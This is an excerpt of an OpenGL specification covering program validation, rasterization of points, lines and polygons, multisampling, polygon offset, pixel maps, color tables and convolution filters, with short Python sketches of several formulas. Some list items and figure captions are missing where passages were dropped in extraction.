• any two active samplers in the current program object are of different types, but refer to the same texture image unit,

• any active sampler in the current program object refers to a texture image unit where fixed-function fragment processing accesses a texture target that does not match the sampler type, or

• the sum of the number of active samplers in the program and the number of texture image units enabled for fixed-function fragment processing exceeds the combined limit on the total number of texture image units allowed.

The command ValidateProgram is used to validate the program object program against the current GL state. Each program object has a boolean status, VALIDATE_STATUS, that is modified as a result of validation. This status can be queried with GetProgramiv (see section 6.1.14). If validation succeeded this status will be set to TRUE, otherwise it will be set to FALSE. If validation succeeded the program object is guaranteed to execute, given the current GL state. If validation failed, the program object is guaranteed to not execute, given the current GL state.

ValidateProgram will check for all the conditions that could lead to an INVALID_OPERATION error when rendering commands are issued, and may check for other conditions as well. For example, it could give a hint on how to optimize some piece of shader code. The information log of program is overwritten with information on the results of the validation, which could be an empty string.
The results written to the information log are typically only useful during application development; an application should not expect different GL implementations to produce identical information.

A shader should not fail to compile, and a program object should not fail to link, due to lack of instruction space or lack of temporary variables. Implementations should ensure that all valid shaders and program objects may be successfully compiled, linked and executed.

Undefined Behavior

When using array or matrix variables in a shader, it is possible to access a variable with an index computed at run time that is outside the declared extent of the variable. Such out-of-bounds reads will return undefined values; out-of-bounds writes will have undefined results and could corrupt other variables used by the shader or the GL. The level of protection provided against such errors in the shader is implementation-dependent.

Rasterization

[Figure: rasterization pipeline — primitives from primitive assembly undergo point, line, polygon, or pixel rectangle (DrawPixels) rasterization, feeding fragment texturing (FRAGMENT_PROGRAM enable) and color sum.]

Several factors affect rasterization. Lines and polygons may be stippled. Points may be given differing diameters and line segments differing widths. A point, line segment, or polygon may be antialiased.

3.1 Invariance

Consider a primitive p′ obtained by translating a primitive p through an offset (x, y) in window coordinates, where x and y are integers. As long as neither p′ nor p is clipped, it must be the case that each fragment f′ produced from p′ is identical to a corresponding fragment f from p except that the center of f′ is offset by (x, y) from the center of f.

3.2 Antialiasing

Antialiasing of a point, line, or polygon is effected in one of two ways depending on whether the GL is in RGBA or color index mode.
In RGBA mode, the R, G, and B values of the rasterized fragment are left unaffected, but the A value is multiplied by a floating-point value in the range [0, 1] that describes a fragment's screen pixel coverage. The per-fragment stage of the GL can be set up to use the A value to blend the incoming fragment with the corresponding pixel already present in the framebuffer.

In color index mode, the least significant b bits (to the left of the binary point) of the color index are used for antialiasing; b = min{4, m}, where m is the number of bits in the color index portion of the framebuffer. The antialiasing process sets these b bits based on the fragment's coverage value: the bits are set to zero for no coverage and to all ones for complete coverage.

The details of how antialiased fragment coverage values are computed are difficult to specify in general. The reason is that high-quality antialiasing may take into account perceptual issues as well as characteristics of the monitor on which the contents of the framebuffer are displayed. Such details cannot be addressed within the scope of this document. Further, the coverage value computed for a fragment of some primitive may depend on the primitive's relationship to a number of grid squares neighboring the one corresponding to the fragment, and not just on the fragment's grid square. Another consideration is that accurate calculation of coverage values may be computationally expensive; consequently we allow a given GL implementation to approximate true coverage values by using a fast but not entirely accurate coverage computation.

In light of these considerations, we chose to specify the behavior of exact antialiasing in the prototypical case that each displayed pixel is a perfect square of uniform intensity. The square is called a fragment square and has lower left corner (x, y) and upper right corner (x + 1, y + 1).
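The color-index rule above fixes only the endpoints (all zeros for no coverage, all b ones for full coverage); the mapping of intermediate coverage values is left to the implementation. One plausible sketch, with linear scaling as an assumed intermediate mapping:

```python
# Sketch of color-index antialiasing: the low b = min(4, m) bits of the
# index encode coverage. The endpoints follow the rule above; linear
# scaling for intermediate coverage is an assumption of this sketch.
def coverage_bits(coverage, m):
    """coverage in [0, 1]; m = bits in the color index buffer."""
    b = min(4, m)
    levels = (1 << b) - 1  # all-ones value for b bits
    return round(coverage * levels)
```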
We recognize that this simple box filter may not produce the most favorable antialiasing results, but it provides a simple, well-defined model.

A GL implementation may use other methods to perform antialiasing, subject to the following conditions:

1. If f1 and f2 are two fragments, and the portion of f1 covered by some primitive is a subset of the corresponding portion of f2 covered by the primitive, then the coverage computed for f1 must be less than or equal to that computed for f2.

3. The sum of the coverage values for all fragments produced by rasterizing a particular primitive must be constant, independent of any rigid motions in window coordinates, as long as none of those fragments lies along window edges.

3.2.1 Multisampling

Multisampling is a mechanism to antialias all GL primitives: points, lines, polygons, bitmaps, and images. The technique is to sample all primitives multiple times at each pixel. The color sample values are resolved to a single, displayable color each time a pixel is updated, so the antialiasing appears to be automatic at the application level. Because each sample includes color, depth, and stencil information, the color (including texture operation), depth, and stencil functions perform equivalently to the single-sample mode.

An additional buffer, called the multisample buffer, is added to the framebuffer. Pixel sample values, including color, depth, and stencil values, are stored in this buffer. Samples contain separate color values for each fragment color. When the framebuffer includes a multisample buffer, it does not include depth or stencil buffers, even if the multisample buffer does not store depth or stencil values. Color buffers (left, right, front, back, and aux) do coexist with the multisample buffer, however.

Multisample antialiasing is most valuable for rendering polygons, because it requires no sorting for hidden surface elimination, and it correctly handles adjacent polygons, object silhouettes, and even intersecting polygons.
If only points or lines are being rendered, the "smooth" antialiasing mechanism provided by the base GL may result in a higher quality image. This mechanism is designed to allow multisample and smooth antialiasing techniques to be alternated during the rendering of a single scene.

If the value of SAMPLE_BUFFERS is one, the rasterization of all primitives is changed, and is referred to as multisample rasterization. Otherwise, primitive rasterization is referred to as single-sample rasterization. The value of SAMPLE_BUFFERS is queried by calling GetIntegerv with pname set to SAMPLE_BUFFERS.

During multisample rendering the contents of a pixel fragment are changed in two ways. First, each fragment includes a coverage value with SAMPLES bits. The value of SAMPLES is an implementation-dependent constant, and is queried by calling GetIntegerv with pname set to SAMPLES.

Second, each fragment includes SAMPLES depth values, color values, and sets of texture coordinates, instead of the single depth value, color value, and set of texture coordinates that is maintained in single-sample rendering mode. An implementation may choose to assign the same color value and the same set of texture coordinates to more than one sample. The location for evaluating the color value and the set of texture coordinates can be anywhere within the pixel including the fragment center or any of the sample locations. The color value and the set of texture coordinates need not be evaluated at the same location. Each pixel fragment thus consists of integer x and y grid coordinates, SAMPLES color and depth values, SAMPLES sets of texture coordinates, and a coverage value with a maximum of SAMPLES bits.

Multisample rasterization is enabled or disabled by calling Enable or Disable with the symbolic constant MULTISAMPLE.

If MULTISAMPLE is disabled, multisample rasterization of all primitives is equivalent to single-sample (fragment-center) rasterization, except that the fragment coverage value is set to full coverage.
The color and depth values and the sets of texture coordinates may all be set to the values that would have been assigned by single-sample rasterization, or they may be assigned as described below for multisample rasterization.

If MULTISAMPLE is enabled, multisample rasterization of all primitives differs substantially from single-sample rasterization. It is understood that each pixel in the framebuffer has SAMPLES locations associated with it. These locations are exact positions, rather than regions or areas, and each is referred to as a sample point. The sample points associated with a pixel may be located inside or outside of the unit square that is considered to bound the pixel. Furthermore, the relative locations of sample points may be identical for each pixel in the framebuffer, or they may differ.

If the sample locations differ per pixel, they should be aligned to window, not screen, boundaries. Otherwise rendering results will be window-position specific. The invariance requirement described in section 3.1 is relaxed for all multisample rasterization, because the sample locations may be a function of pixel location.

It is not possible to query the actual sample locations of a pixel.

3.3 Points

If a vertex shader is not active, then the rasterization of points is controlled with the PointSize command. size specifies the requested size of a point. The default value is 1.0. A value less than or equal to zero results in the error INVALID_VALUE.

The requested point size is multiplied with a distance attenuation factor, clamped to a specified point size range, and further clamped to the implementation-dependent point size range to produce the derived point size:

    derived size = clamp( size × sqrt( 1 / (a + b·d + c·d²) ) )

where d is the eye-coordinate distance from the eye, (0, 0, 0, 1) in eye coordinates, to the vertex, and a, b, and c are distance attenuation function coefficients.

If multisampling is not enabled, the derived size is passed on to rasterization as the point width.
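The derived point size formula above can be worked through numerically. The function below is a sketch: it applies the attenuation factor, then the POINT_SIZE_MIN/POINT_SIZE_MAX clamp, then the implementation-dependent range clamp; the range values passed in are illustrative.

```python
import math

# Worked sketch of: derived size = clamp(size * sqrt(1/(a + b*d + c*d^2))),
# clamped first to the user range (POINT_SIZE_MIN..POINT_SIZE_MAX) and
# then to the implementation-dependent point size range.
def derived_point_size(size, d, abc, user_range, impl_range):
    a, b, c = abc
    attenuated = size * math.sqrt(1.0 / (a + b * d + c * d * d))
    lo, hi = user_range
    clamped = min(max(attenuated, lo), hi)
    lo, hi = impl_range
    return min(max(clamped, lo), hi)
```

With the default attenuation coefficients (a, b, c) = (1, 0, 0) the factor is 1 and the requested size passes through unchanged; with c nonzero the size falls off with distance.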
If a vertex shader is active and vertex program point size mode is enabled, then the derived point size is taken from the (potentially clipped) shader built-in gl_PointSize and clamped to the implementation-dependent point size range. If the value written to gl_PointSize is less than or equal to zero, results are undefined. If a vertex shader is active and vertex program point size mode is disabled, then the derived point size is taken from the point size state as specified by the PointSize command. In this case no distance attenuation is performed. Vertex program point size mode is enabled and disabled by calling Enable or Disable with the symbolic value VERTEX_PROGRAM_POINT_SIZE.

The distance attenuation function coefficients a, b, and c, the bounds of the first point size range clamp, and the point fade threshold, are specified with

    void PointParameter{if}( enum pname, T param );
    void PointParameter{if}v( enum pname, const T params );

If pname is POINT_SIZE_MIN or POINT_SIZE_MAX, then param specifies, or params points to, the lower or upper bound respectively to which the derived point size is clamped. If the lower bound is greater than the upper bound, the point size after clamping is undefined. If pname is POINT_DISTANCE_ATTENUATION, then params points to the coefficients a, b, and c. If pname is POINT_FADE_THRESHOLD_SIZE, then param specifies, or params points to, the point fade threshold. Values of POINT_SIZE_MIN, POINT_SIZE_MAX, or POINT_FADE_THRESHOLD_SIZE less than zero result in the error INVALID_VALUE.

Point antialiasing is enabled or disabled by calling Enable or Disable with the symbolic constant POINT_SMOOTH. The default state is for point antialiasing to be disabled.

Point sprites are enabled or disabled by calling Enable or Disable with the symbolic constant POINT_SPRITE. The default state is for point sprites to be disabled. When point sprites are enabled, the state of the point antialiasing enable is ignored.
The point sprite texture coordinate replacement mode is set with one of the TexEnv* commands described in section 3.8.13, where target is POINT_SPRITE and pname is COORD_REPLACE. The possible values for param are FALSE and TRUE. The default value for each texture coordinate set is for point sprite texture coordinate replacement to be disabled.

The point sprite texture coordinate origin is set with the PointParameter* commands where pname is POINT_SPRITE_COORD_ORIGIN and param is LOWER_LEFT or UPPER_LEFT. The default value is UPPER_LEFT.

[Figure 3.2: Rasterization of non-antialiased wide points. The crosses show fragment centers produced by rasterization for any point that lies within the shaded region. The dotted grid lines lie on half-integer coordinates.]

[Figure caption fragment: ... corresponding fragment square. Solid lines lie on integer coordinates.]

    t = 1/2 + (y_f + 1/2 − y_w) / size,   POINT_SPRITE_COORD_ORIGIN = LOWER_LEFT
    t = 1/2 − (y_f + 1/2 − y_w) / size,   POINT_SPRITE_COORD_ORIGIN = UPPER_LEFT    (3.4)

where size is the point's size, x_f and y_f are the (integral) window coordinates of the fragment, and x_w and y_w are the exact, unrounded window coordinates of the vertex for the point.

The widths supported for point sprites must be a superset of those supported for antialiased points. There is no requirement that these widths must be equally spaced. If an unsupported width is requested, the nearest supported width is used instead.

2. The total number of fragments produced by the algorithm may differ from that produced by the diamond-exit rule by no more than one.

3. For an x-major line, no two fragments may be produced that lie in the same window-coordinate column (for a y-major line, no two fragments may appear in the same row).

4.
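Equation 3.4 above can be checked with a small evaluator. This is a sketch of the t coordinate only (the s coordinate follows the same pattern in x); the function name and string-valued origin parameter are illustrative.

```python
# Sketch of equation 3.4: the point sprite t texture coordinate for a
# fragment, under the two POINT_SPRITE_COORD_ORIGIN modes.
def sprite_t(yf, yw, size, origin):
    """yf: integral fragment window y; yw: unrounded vertex window y."""
    offset = (yf + 0.5 - yw) / size
    if origin == "LOWER_LEFT":
        return 0.5 + offset
    return 0.5 - offset  # UPPER_LEFT
```

A fragment at the sprite's vertical center gets t = 0.5 in either mode; fragments above the center get larger t with a LOWER_LEFT origin and smaller t with an UPPER_LEFT origin.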
If two line segments share a common endpoint, and both segments are either x-major (both left-to-right or both right-to-left) or y-major (both bottom-to-top or both top-to-bottom), then rasterizing both segments may not produce duplicate fragments, nor may any fragments be omitted so as to interrupt continuity of the connected segments.

Next we must specify how the data associated with each rasterized fragment are obtained. Let the window coordinates of a produced fragment center be given by p_r = (x_d, y_d) and let p_a = (x_a, y_a) and p_b = (x_b, y_b). Set

    t = ((p_r − p_a) · (p_b − p_a)) / ‖p_b − p_a‖²    (3.5)

(Note that t = 0 at p_a and t = 1 at p_b.) The value of an associated datum f for the fragment, whether it be primary or secondary R, G, B, or A (in RGBA mode) or a color index (in color index mode), the fog coordinate, an s, t, r, or q texture coordinate, or the clip w coordinate, is found as given by equation 3.6.

Line Stipple

The LineStipple command defines a line stipple. pattern is an unsigned short integer. The line stipple is taken from the lowest order 16 bits of pattern. It determines those fragments that are to be drawn when the line is rasterized. factor is a count that is used to modify the effective line stipple by causing each bit in line stipple to be used factor times. factor is clamped to the range [1, 256]. Line stippling may be enabled or disabled using Enable or Disable with the constant LINE_STIPPLE. When disabled, it is as if the line stipple has its default value.

Line stippling masks certain fragments that are produced by rasterization so that they are not sent to the per-fragment stage of the GL. The masking is achieved using three parameters: the 16-bit line stipple p, the line repeat count r, and an integer stipple counter s. Let

    b = ⌊s/r⌋ mod 16

Then a fragment is produced if the bth bit of p is 1, and not produced otherwise. The bits of p are numbered with 0 being the least significant and 15 being the most significant.
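The stipple test just described is easy to state in code. This sketch evaluates the mask for a single fragment; pattern, factor, and the counter s are passed in explicitly rather than read from GL state.

```python
# Sketch of the stipple test: with 16-bit pattern p, repeat factor r
# (clamped to [1, 256]) and stipple counter s, bit b = (s // r) mod 16
# of p decides whether the fragment is produced.
def stipple_produces(pattern, factor, s):
    factor = min(max(factor, 1), 256)
    b = (s // factor) % 16
    return (pattern >> b) & 1 == 1
```

With pattern 0x00FF and factor 1, the first eight fragments of a segment are produced and the next eight are masked; factor 2 stretches each bit across two fragments.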
The initial value of s is zero; s is incremented after production of each fragment of a line segment (fragments are produced in order, beginning at the starting point and working towards the ending point). s is reset to 0 whenever a Begin occurs, and before every line segment in a group of independent segments (as specified when Begin is invoked with LINES).

If the line segment has been clipped, then the value of s at the beginning of the line segment is indeterminate.

Wide Lines

The actual width of non-antialiased lines is determined by rounding the supplied width to the nearest integer, then clamping it to the implementation-dependent maximum non-antialiased line width. This implementation-dependent value must be no less than the implementation-dependent maximum antialiased line width, rounded to the nearest integer value, and in any event no less than 1. If rounding the specified width results in the value 0, then it is as if the value were 1.

Non-antialiased line segments of width other than one are rasterized by offsetting them in the minor direction (for an x-major line, the minor direction is y, and for a y-major line, the minor direction is x) and replicating fragments in the minor direction (see figure 3.5). Let w be the width rounded to the nearest integer (if w = 0, then it is as if w = 1). If the line segment has endpoints given by (x0, y0) and (x1, y1) in window coordinates, the segment with endpoints (x0, y0 − (w − 1)/2) and (x1, y1 − (w − 1)/2) is rasterized, but instead of a single fragment, a column of fragments of height w (a row of fragments of length w for a y-major segment) is produced at each x (y for y-major) location. The lowest fragment of this column is the fragment that would be produced by rasterizing the segment of width 1 with the modified coordinates. The whole column is not produced if the stipple bit for the column's x location is zero; otherwise, the whole column is produced.
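The offset-and-replicate scheme for wide x-major lines can be sketched as below. This is a simplified illustration: it uses a basic sample-at-column-center rule in place of the specification's exact diamond-exit rule, and ignores stippling; only the y offset by (w − 1)/2 and the column replication follow the text above.

```python
import math

# Simplified sketch of wide non-antialiased x-major line rasterization:
# the segment is offset by -(w-1)/2 in y, rasterized at width 1, and each
# resulting fragment is replicated into a column of height w.
def wide_line_fragments(x0, y0, x1, y1, w):
    """Returns (x, y) fragment coordinates for an x-major segment."""
    w = max(int(round(w)), 1)  # width 0 behaves as width 1
    frags = []
    dy = (y1 - y0) / (x1 - x0)
    for x in range(int(x0), int(x1)):
        # lowest fragment of the column, from the offset width-1 segment
        y = math.floor(y0 + dy * (x + 0.5 - x0) - (w - 1) / 2)
        frags.extend((x, y + k) for k in range(w))
    return frags
```

For a horizontal segment through y = 0.5 with w = 3, each x location produces the column of rows −1, 0, 1.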
Antialiasing

Rasterized antialiased line segments produce fragments whose fragment squares intersect a rectangle centered on the line segment. Two of the edges are parallel to the specified line segment; each is at a distance of one-half the current width from that segment: one above the segment and one below it. The other two edges pass through the line endpoints and are perpendicular to the direction of the specified line segment. Coverage values are computed for each fragment by computing the area of the intersection of the rectangle with the fragment square (see figure 3.6; see also section 3.2). Equation 3.6 is used to compute associated data values just as with non-antialiased lines; equation 3.5 is used to find the value of t for each fragment whose square is intersected by the line segment's rectangle. Not all widths need be supported for line segment antialiasing, but width 1.0 antialiased segments must be provided. As with the point width, a GL implementation may be queried for the range and number of gradations of available antialiased line widths.

[Figure 3.5. Rasterization of non-antialiased wide lines. x-major line segments of widths 2 and 3 are shown. The heavy line segment is the one specified to be rasterized; the light segment is the offset segment used for rasterization. x marks indicate the fragment centers produced by rasterization.]

For purposes of antialiasing, a stippled line is considered to be a sequence of contiguous rectangles centered on the line segment. Each rectangle has width equal to the current line width and length equal to 1 pixel (except the last, which may be shorter). These rectangles are numbered from 0 to n, starting with the rectangle incident on the starting endpoint of the segment. Each of these rectangles is either eliminated or produced according to the procedure given under Line Stipple, above, where "fragment" is replaced with "rectangle." Each rectangle so produced is rasterized as if it were an antialiased polygon, described below (but culling, non-default settings of PolygonMode, and polygon stippling are not applied).
[Figure 3.6. The region used in rasterizing and finding corresponding coverage values for an antialiased line segment (an x-major line segment is shown).]

3.5 Polygons

A polygon results from a polygon Begin/End object, a triangle resulting from a triangle strip, triangle fan, or series of separate triangles, or a quadrilateral arising from a quadrilateral strip, series of separate quadrilaterals, or a Rect command. Like points and line segments, polygon rasterization is controlled by several variables. Polygon antialiasing is controlled with Enable and Disable with the symbolic constant POLYGON_SMOOTH. The analog to line segment stippling for polygons is polygon stippling, described below.

Culling is specified with

    void CullFace( enum mode );

mode is a symbolic constant: one of FRONT, BACK or FRONT_AND_BACK. Culling is enabled or disabled with Enable or Disable using the symbolic constant CULL_FACE. Front facing polygons are rasterized if either culling is disabled or the CullFace mode is BACK, while back facing polygons are rasterized only if either culling is disabled or the CullFace mode is FRONT. The initial setting of the CullFace mode is BACK. Initially, culling is disabled.

The rule for determining which fragments are produced by polygon rasterization is called point sampling. The two-dimensional projection obtained by taking the x and y window coordinates of the polygon's vertices is formed. Fragment centers that lie inside of this polygon are produced by rasterization. Special treatment is given to a fragment whose center lies on a polygon boundary edge. In such a case we require that if two polygons lie on either side of a common edge (with identical endpoints) on which a fragment center lies, then exactly one of the polygons results in the production of the fragment during rasterization.

As for the data associated with each fragment produced by rasterizing a polygon, we begin by specifying how these values are produced for fragments in a triangle. Define barycentric coordinates for a triangle.
Barycentric coordinates are a set of three numbers, a, b, and c, each in the range [0, 1], with a + b + c = 1. These coordinates uniquely specify any point p within the triangle or on the triangle's boundary as

    p = a pa + b pb + c pc,

where pa, pb, and pc are the vertices of the triangle. a, b, and c can be found as

    a = A(p pb pc) / A(pa pb pc),  b = A(pa p pc) / A(pa pb pc),  c = A(pa pb p) / A(pa pb pc),

where A(lmn) denotes the area in window coordinates of the triangle with vertices l, m, and n.

Denote an associated datum at pa, pb, or pc as fa, fb, or fc, respectively. Then the value f of a datum at a fragment produced by rasterizing a triangle is given by

    f = (a fa / wa + b fb / wb + c fc / wc) / (a / wa + b / wb + c / wc)

where wa, wb, and wc are the clip w coordinates of pa, pb, and pc, respectively.

For a polygon with more than three edges, we require only that a convex combination of the values of the datum at the polygon's vertices can be used to obtain the value assigned to each fragment produced by the rasterization algorithm. That is, it must be the case that at every fragment

    f = Σ_{i=1}^{n} ai fi

where n is the number of vertices in the polygon and fi is the value of f at vertex i; for each i, 0 ≤ ai ≤ 1 and Σ_{i=1}^{n} ai = 1. The values of the ai may differ from fragment to fragment.

3.5.2 Stippling

Polygon stippling works much the same way as line stippling, masking out certain fragments produced by rasterization so that they are not sent to the next stage of the GL. This is the case regardless of the state of polygon antialiasing. Stippling is controlled with

    void PolygonStipple( ubyte *pattern );

3.5.3 Antialiasing

face is one of FRONT, BACK, or FRONT_AND_BACK, indicating that the rasterizing method described by mode replaces the rasterizing method for front facing polygons, back facing polygons, or both front and back facing polygons, respectively. mode is one of the symbolic constants POINT, LINE, or FILL. Calling PolygonMode with POINT causes certain vertices of a polygon to be treated, for rasterization purposes, just as if they were enclosed within a Begin(POINT) and End pair. The vertices selected for this treatment are those that have been tagged as having a polygon boundary edge beginning on them (see section 2.6.2).
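The area-ratio construction and the convex combination of per-vertex data can be sketched as follows (hypothetical helpers; the window-space linear case is shown, without the clip-w perspective correction):

```python
def barycentric(p, pa, pb, pc):
    """Barycentric coordinates (a, b, c) of p via signed triangle areas:
    a = A(p pb pc) / A(pa pb pc), and similarly for b and c."""
    def area(l, m, n):
        # Signed area of triangle lmn in window coordinates.
        return 0.5 * ((m[0] - l[0]) * (n[1] - l[1])
                      - (n[0] - l[0]) * (m[1] - l[1]))
    A = area(pa, pb, pc)
    return (area(p, pb, pc) / A,
            area(pa, p, pc) / A,
            area(pa, pb, p) / A)

def interpolate(f_abc, bary):
    """Convex combination of the per-vertex data fa, fb, fc."""
    a, b, c = bary
    fa, fb, fc = f_abc
    return a * fa + b * fb + c * fc
```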
LINE causes edges that are tagged as boundary to be rasterized as line segments. (The line stipple counter is reset at the beginning of the first rasterized edge of the polygon, but not for subsequent edges.) FILL is the default mode of polygon rasterization, corresponding to the description in sections 3.5.1, 3.5.2, and 3.5.3. Note that these modes affect only the final rasterization of polygons: in particular, a polygon's vertices are lit, and the polygon is clipped and possibly culled before these modes are applied.

Polygon antialiasing applies only to the FILL state of PolygonMode. For POINT or LINE, point antialiasing or line segment antialiasing, respectively, apply.

factor scales the maximum depth slope of the polygon, and units scales an implementation dependent constant that relates to the usable resolution of the depth buffer. The resulting values are summed to produce the polygon offset value. Both factor and units may be either positive or negative.

The maximum depth slope m of a triangle is

    m = √((∂zw/∂xw)² + (∂zw/∂yw)²)    (3.9)

where (xw, yw, zw) is a point on the triangle. m may be approximated as

    m = max(|∂zw/∂xw|, |∂zw/∂yw|).    (3.10)

If the polygon has more than three vertices, one or more values of m may be used during rasterization. Each may take any value in the range [min, max], where min and max are the smallest and largest values obtained by evaluating equation 3.9 or equation 3.10 for the triangles formed by all three-vertex combinations.

The minimum resolvable difference r is an implementation constant. It is the smallest difference in window coordinate z values that is guaranteed to remain distinct throughout polygon rasterization and in the depth buffer. All pairs of fragments generated by the rasterization of two polygons with otherwise identical vertices, but zw values that differ by r, will have distinct depth values.

The offset value o for a polygon is

    o = m ∗ factor + r ∗ units.

The initial PolygonMode setting is FILL for both front and back facing polygons.
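The text's description (the maximum depth slope scaled by factor, plus the minimum resolvable difference scaled by units) can be sketched as (a hypothetical helper; the r default below is only a placeholder for the implementation constant):

```python
import math

def polygon_offset(dzdx, dzdy, factor, units, r=2.0 ** -23, exact=True):
    """Polygon offset o = m * factor + r * units. m is the maximum depth
    slope, either the exact form of eq. 3.9 or the max-of-absolute-values
    approximation of eq. 3.10; r is the implementation's minimum
    resolvable depth difference."""
    if exact:
        m = math.sqrt(dzdx * dzdx + dzdy * dzdy)   # eq. 3.9
    else:
        m = max(abs(dzdx), abs(dzdy))              # eq. 3.10
    return m * factor + r * units
```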
The initial polygon offset factor and bias values are both 0; initially polygon offset is disabled for all modes.

In addition to storing pixel data in client memory, pixel data may also be stored in buffer objects (described in section 2.9). The current pixel unpack and pack buffer objects are designated by the PIXEL_UNPACK_BUFFER and PIXEL_PACK_BUFFER targets respectively.

Initially, zero is bound for the PIXEL_UNPACK_BUFFER, indicating that image specification commands such as DrawPixels source their pixels from client memory pointer parameters. However, if a non-zero buffer object is bound as the current pixel unpack buffer, then the pointer parameter is treated as an offset into the designated buffer object.

Pixel transfer parameters are set with

    void PixelTransfer{if}( enum param, T value );

param is a symbolic constant indicating a parameter to be set, and value is the value to set it to. Table 3.2 summarizes the pixel transfer parameters that are set with PixelTransfer, their types, their initial values, and their allowable ranges. Setting a parameter to a value outside the given range results in the error INVALID_VALUE. The same versions of the command exist as for PixelStore, and the same rules apply to accepting and converting passed values to set parameters.

The pixel map lookup tables are set with

    void PixelMap{ui us f}v( enum map, sizei size, T values );

map is a symbolic map name, indicating the map to set, size indicates the size of the map, and values refers to an array of size map values.

The entries of a table may be specified using one of three types: single-precision floating-point, unsigned short integer, or unsigned integer, depending on which of the three versions of PixelMap is called. A table entry is converted to the appropriate type when it is specified. An entry giving a color component value is converted according to table 2.9. An entry giving a color index value is converted from an unsigned short integer or unsigned integer to floating-point. An entry giving a stencil index is converted from single-precision floating-point to an integer by rounding to nearest.
The various tables and their initial sizes and entries are summarized in table 3.3. A table that takes an index as an address must have size = 2ⁿ or the error INVALID_VALUE results. The maximum allowable size of each table is specified by the implementation dependent value MAX_PIXEL_MAP_TABLE, but must be at least 32 (a single maximum applies to all tables). The error INVALID_VALUE is generated if a size larger than the implemented maximum, or less than one, is given to PixelMap.

If a pixel unpack buffer is bound (as indicated by a non-zero value of PIXEL_UNPACK_BUFFER_BINDING), values is an offset into the pixel unpack buffer; otherwise, values is a pointer to client memory. All pixel storage and pixel transfer modes are ignored when specifying a pixel map. n machine units are read, where n is the size of the pixel map times the size of a float, uint, or ushort.

A color lookup table is specified with

    void ColorTable( enum target, enum internalformat, sizei width, enum format, enum type, void *data );

target must be one of the regular color table names listed in table 3.4 to define the table. A proxy table name is a special case discussed later in this section. width, format, type, and data specify an image in memory with the same meaning and allowed values as the corresponding arguments to DrawPixels (see section 3.6.4), with height taken to be 1. The maximum allowable width of a table is implementation-dependent, but must be at least 32. The formats COLOR_INDEX, DEPTH_COMPONENT, and STENCIL_INDEX and the type BITMAP are not allowed.

The specified image is taken from memory and processed just as if DrawPixels were called, stopping after the final expansion to RGBA. The R, G, B, and A components of each pixel are then scaled by the four COLOR_TABLE_SCALE parameters, biased by the four COLOR_TABLE_BIAS parameters, and clamped to [0, 1]. These parameters are set by calling ColorTableParameterfv as described below.

[Table 3.4: Color table names. Regular tables have associated image data. Proxy tables have no image data, and are used only to determine if an image can be loaded into the corresponding regular table.]
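The power-of-two size requirement for index-addressed tables can be sketched as follows (a hypothetical helper; masking the index by size − 1 before lookup is an assumption of this sketch):

```python
def pixel_map_lookup(table, index):
    """Look up an integer index in a pixel map table. A table addressed
    by an index must have size 2**n; the index is masked by size - 1
    (i.e. taken modulo the table size) before the lookup."""
    size = len(table)
    if size == 0 or size & (size - 1) != 0:
        raise ValueError("INVALID_VALUE: size must be 2**n")
    return table[index & (size - 1)]
```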
The color lookup table is redefined to have width entries, each with the specified internal format. The table is formed with indices 0 through width − 1. Table location i is specified by the ith image pixel, counting from zero.

The error INVALID_VALUE is generated if width is not zero or a non-negative power of two. The error TABLE_TOO_LARGE is generated if the specified color lookup table is too large for the implementation.

The scale and bias parameters for a table are specified by calling

    void ColorTableParameter{if}v( enum target, enum pname, T params );

target must be a regular color table name. pname is one of COLOR_TABLE_SCALE or COLOR_TABLE_BIAS. params points to an array of four values: red, green, blue, and alpha, in that order.

A GL implementation may vary its allocation of internal component resolution based on any ColorTable parameter, but the allocation must not be a function of any other factor, and cannot be changed once it is established. Allocations must be invariant; the same allocation must be made each time a color table is specified with the same parameter values. These allocation rules also apply to proxy color tables, which are described later in this section.

The command

    void CopyColorTable( enum target, enum internalformat, int x, int y, sizei width );

defines a color table in exactly the manner of ColorTable, except that table data are taken from the framebuffer, rather than from client memory. target must be a regular color table name. x, y, and width correspond precisely to the corresponding arguments of CopyPixels (refer to section 4.3.3); they specify the image's width and the lower left (x, y) coordinates of the framebuffer region to be copied. The image is taken from the framebuffer exactly as if these arguments were passed to CopyPixels with argument type set to COLOR and height set to 1, stopping after the final expansion to RGBA.

Subsequent processing is identical to that described for ColorTable, beginning with scaling by COLOR_TABLE_SCALE. Parameters target, internalformat and width are specified using the same values, with the same meanings, as the equivalent arguments of ColorTable.
format is taken to be RGBA.

Two additional commands,

    void ColorSubTable( enum target, sizei start, sizei count, enum format, enum type, void *data );
    void CopyColorSubTable( enum target, sizei start, int x, int y, sizei count );

respecify only a portion of an existing color table. No change is made to the internalformat or width parameters of the specified color table, nor is any change made to table entries outside the specified portion. target must be a regular color table name.

ColorSubTable arguments format, type, and data match the corresponding arguments to ColorTable, meaning that they are specified using the same values, and have the same meanings. Likewise, CopyColorSubTable arguments x, y, and count match the x, y, and width arguments of CopyColorTable. Both of the ColorSubTable commands interpret and process pixel groups in exactly the manner of their ColorTable counterparts, except that the assignment of R, G, B, and A pixel group values to the color table components is controlled by the internalformat of the table, not by an argument to the command.

A two-dimensional convolution filter image is specified with

    void ConvolutionFilter2D( enum target, enum internalformat, sizei width, sizei height, enum format, enum type, void *data );

target must be CONVOLUTION_2D. width, height, format, type, and data specify an image in memory with the same meaning and allowed values as the corresponding parameters to DrawPixels. The formats COLOR_INDEX, DEPTH_COMPONENT, and STENCIL_INDEX and the type BITMAP are not allowed.

The specified image is extracted from memory and processed just as if DrawPixels were called, stopping after the final expansion to RGBA. The R, G, B, and A components of each pixel are then scaled by the four two-dimensional CONVOLUTION_FILTER_SCALE parameters and biased by the four two-dimensional CONVOLUTION_FILTER_BIAS parameters. These parameters are set by calling ConvolutionParameterfv as described below. No clamping takes place at any time during this process.

The red, green, blue, alpha, luminance, and/or intensity components of the pixels are stored in floating point, rather than integer format.
They form a two-dimensional image indexed with coordinates i, j such that i increases from left to right, starting at zero, and j increases from bottom to top, also starting at zero. Image location i, j is specified by the Nth pixel, counting from zero, where

    N = i + j ∗ width.

A one-dimensional convolution filter is defined with

    void ConvolutionFilter1D( enum target, enum internalformat, sizei width, enum format, enum type, void *data );

target must be CONVOLUTION_1D. internalformat, width, format, and type have identical semantics and accept the same values as do their two-dimensional counterparts. data must point to a one-dimensional image, however.

The image is extracted from memory and processed as if ConvolutionFilter2D were called with a height of 1, except that it is scaled and biased by the one-dimensional CONVOLUTION_FILTER_SCALE and CONVOLUTION_FILTER_BIAS parameters. These parameters are specified exactly as the two-dimensional parameters, except that ConvolutionParameterfv is called with target CONVOLUTION_1D.

